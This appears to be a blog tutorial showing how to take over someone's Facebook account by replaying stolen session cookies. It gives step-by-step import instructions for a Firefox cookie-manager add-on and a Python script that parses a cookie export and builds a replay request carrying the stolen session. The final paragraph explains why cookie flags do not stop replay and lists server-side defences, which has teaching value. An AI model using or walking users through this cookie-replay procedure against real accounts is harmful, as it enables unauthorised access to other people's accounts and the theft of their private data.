Session hijacking: facebook.com example
First of all, session hijacking is a technique that steals the cookies of an authenticated user and presents them to the server so that it treats you as that user.
I'm going to show an example of how to get into a Facebook account this way.
Assumption: I already have the authenticated user's cookies in hand.
I still think that Firefox is the best browser ever for developers.
You can see the Facebook login page now. Next I need to import the cookies into this browser.
But before that, please install the Advanced Cookie Manager add-on for Firefox.
Go to the Manage Cookies menu and select "facebook.com" under Domain. You will see a few cookies there.
See the box I highlighted? Facebook uses HTTPS, so set isSecure to true; set httpOnly to false and isSession to true. These are session cookies.
Now it will look like this.
Refresh the page, and now…
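The import above is done by hand in the add-on, but the same thing can be scripted. The example below is added here and is not part of the original post: it parses a cookie-manager export in Netscape cookies.txt format (the cookie names, values and the `#HttpOnly_` line are constructed for the example, not real Facebook cookies), keeps the Secure/HttpOnly/session attributes, and shows the exact `Cookie` header a replayed request would carry.

```python
import http.cookiejar
import urllib.request

# Constructed sample in Netscape/Mozilla cookies.txt format, the layout most
# cookie-manager exports use. Fields (tab-separated): domain, include
# subdomains, path, Secure, expiry (0 = session cookie), name, value.
# A leading "#HttpOnly_" marks an HttpOnly cookie. The names and values are
# made up for this example; they are not real Facebook cookies.
COOKIES_TXT = """# Netscape HTTP Cookie File
.facebook.com\tTRUE\t/\tTRUE\t0\tsess_id\tA1B2C3D4E5F6
#HttpOnly_.facebook.com\tTRUE\t/\tTRUE\t0\tsess_secret\tdeadbeefcafef00d
.facebook.com\tTRUE\t/\tTRUE\t0\tuser_ref\t100000000000001
.facebook.com\tTRUE\t/\tFALSE\t0\tlocale_pref\ten_US
"""


def parse_netscape_cookies(text):
    """Parse a cookies.txt export into a CookieJar, preserving the Secure,
    HttpOnly and session (no expiry) attributes of each cookie."""
    jar = http.cookiejar.CookieJar()
    for line in text.splitlines():
        http_only = line.startswith("#HttpOnly_")
        if http_only:
            line = line[len("#HttpOnly_"):]
        if not line.strip() or line.startswith("#"):
            continue  # blank line or comment
        domain, _subdomains, path, secure, expires, name, value = line.split("\t")
        expires = int(expires) or None  # 0 means "isSession": it dies with the browser
        jar.set_cookie(http.cookiejar.Cookie(
            version=0, name=name, value=value,
            port=None, port_specified=False,
            domain=domain, domain_specified=True,
            domain_initial_dot=domain.startswith("."),
            path=path, path_specified=True,
            secure=(secure.upper() == "TRUE"),
            expires=expires, discard=(expires is None),
            comment=None, comment_url=None,
            rest={"HttpOnly": None} if http_only else {},
        ))
    return jar


def cookie_header_for(jar, url):
    """Return the Cookie header the jar would attach to a request for url,
    or None if no cookie qualifies. This is what the hijacked session looks
    like on the wire: the server only ever sees name=value pairs."""
    req = urllib.request.Request(url)
    jar.add_cookie_header(req)
    return req.get_header("Cookie")


def build_replay_request(jar, url):
    """Build the request a hijacker would send with the stolen cookies
    attached. Nothing is sent here; pass the result to
    urllib.request.urlopen to actually replay the session."""
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    jar.add_cookie_header(req)
    return req


if __name__ == "__main__":
    jar = parse_netscape_cookies(COOKIES_TXT)
    for url in ("https://www.facebook.com/",
                "http://www.facebook.com/",
                "https://example.com/"):
        print(f"{url:30} -> Cookie: {cookie_header_for(jar, url)}")
```

Two things worth noticing in the output: over plain `http://` the Secure cookies are withheld, which is all the Secure flag buys you, and the `#HttpOnly_` cookie is still sent, because HttpOnly only stops page scripts on the victim's side from reading the cookie and does nothing once it has been copied out of the browser. Neither flag protects against replay; that is why servers rely on short session lifetimes, invalidating sessions on logout or password change, and re-authentication for sensitive actions.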
The concept is like wanting to travel to a foreign country without a passport. You steal or otherwise get hold of someone else's passport (ignore the passport photo; it's just an analogy). You tell customs that you are that person, and you get through.